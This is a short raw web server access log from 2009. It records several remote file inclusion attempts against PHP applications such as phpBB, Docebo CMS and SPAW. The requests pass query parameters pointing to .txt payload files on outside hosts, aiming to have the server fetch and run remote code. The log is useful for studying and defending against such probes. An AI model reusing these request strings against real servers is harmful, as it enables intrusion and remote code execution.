83.103.72.130 - - [01/Nov/2009:01:37:00 -0400] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:01:37:00 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:00 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:01:37:03 -0400] "GET /spaw_control.class.php?phpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.103.72.130 - - [01/Nov/2009:01:37:14 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:37:14 -0400] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
